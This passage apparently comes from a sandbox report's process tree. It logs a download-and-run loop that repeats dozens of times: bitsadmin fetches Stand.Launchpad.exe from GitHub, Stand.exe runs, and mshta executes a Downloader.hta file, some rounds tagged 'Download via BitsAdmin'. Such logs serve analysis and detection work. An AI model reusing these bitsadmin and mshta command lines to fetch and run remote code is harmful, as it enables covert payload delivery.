        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        217⤵
        Download via BitsAdmin
        
        PID:860
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        217⤵
        
        PID:3888
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        218⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        218⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        219⤵
        Download via BitsAdmin
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        219⤵
        
        PID:3808
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        220⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        220⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        221⤵
        
        PID:6220
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        221⤵
        
        PID:5772
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        222⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        222⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        223⤵
        Download via BitsAdmin
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        223⤵
        
        PID:4184
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        224⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        224⤵
        
        PID:5040
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        225⤵
        Download via BitsAdmin
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        225⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        226⤵
        
        PID:6724
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        226⤵
        
        PID:6272
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        227⤵
        Download via BitsAdmin
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        227⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        228⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        228⤵
        
        PID:3268
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        229⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        229⤵
        
        PID:284
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        230⤵
        
        PID:1756
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        230⤵
        
        PID:3896
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        231⤵
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        231⤵
        
        PID:6512
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        232⤵
        
        PID:5588
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        232⤵
        
        PID:5000
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        233⤵
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        233⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        234⤵
        
        PID:6828
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        234⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        235⤵
        Download via BitsAdmin
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        235⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        236⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        236⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        237⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        237⤵
        
        PID:6832
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        238⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        238⤵
        
        PID:6844
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        239⤵
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        239⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        240⤵
        
        PID:1048
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        240⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        241⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        241⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        242⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        242⤵
        
        PID:6408
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        243⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        243⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        244⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        244⤵
        
        PID:4192
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        245⤵
        Download via BitsAdmin
        
        PID:7148
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        245⤵
        
        PID:3328
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        246⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        246⤵
        
        PID:6872
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        247⤵
        
        PID:6532
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        247⤵
        
        PID:5928
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        248⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        248⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        249⤵
        Download via BitsAdmin
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        249⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        250⤵
        
        PID:4928
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        250⤵
        
        PID:1532
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        251⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        251⤵
        
        PID:5812
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        252⤵
        
        PID:3568
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        252⤵
        
        PID:3948
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        253⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        253⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        254⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        254⤵
        
        PID:2340
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        255⤵
        
        PID:6020
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        255⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        256⤵
        
        PID:6336
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        256⤵
        
        PID:5048
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        257⤵
        Download via BitsAdmin
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        257⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        258⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        258⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        259⤵
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        259⤵
        
        PID:6616
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        260⤵
        
        PID:7060
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        260⤵
        
        PID:3808
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        261⤵
        Download via BitsAdmin
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        261⤵
        
        PID:6692
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        262⤵
        
        PID:6220
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        262⤵
        
        PID:5004
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        263⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        263⤵
        
        PID:3820
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        264⤵
        
        PID:5264
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        264⤵
        
        PID:6620
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        265⤵
        Download via BitsAdmin
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        265⤵
        
        PID:7052
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        266⤵
        
        PID:6436
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        266⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        267⤵
        Download via BitsAdmin
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        267⤵
        
        PID:5580
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        268⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        268⤵
        
        PID:3444
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        269⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        269⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        270⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        270⤵
        
        PID:6920
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        271⤵
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        271⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        272⤵
        
        PID:4352
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        272⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        273⤵
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        273⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        274⤵
        
        PID:6192
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        274⤵
        
        PID:6728
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        275⤵
        
        PID:5624
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        275⤵
        
        PID:5616
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        276⤵
        
        PID:3624
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        276⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        277⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        277⤵
        
        PID:4808
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        278⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        278⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        279⤵
        Download via BitsAdmin
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        279⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        280⤵
        
        PID:6828
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        280⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        281⤵
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        281⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        282⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        282⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        283⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        283⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        284⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        284⤵
        
        PID:6668
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        285⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        285⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        286⤵
        
        PID:2996
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        286⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        287⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        287⤵
        
        PID:5756
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        288⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        288⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        289⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
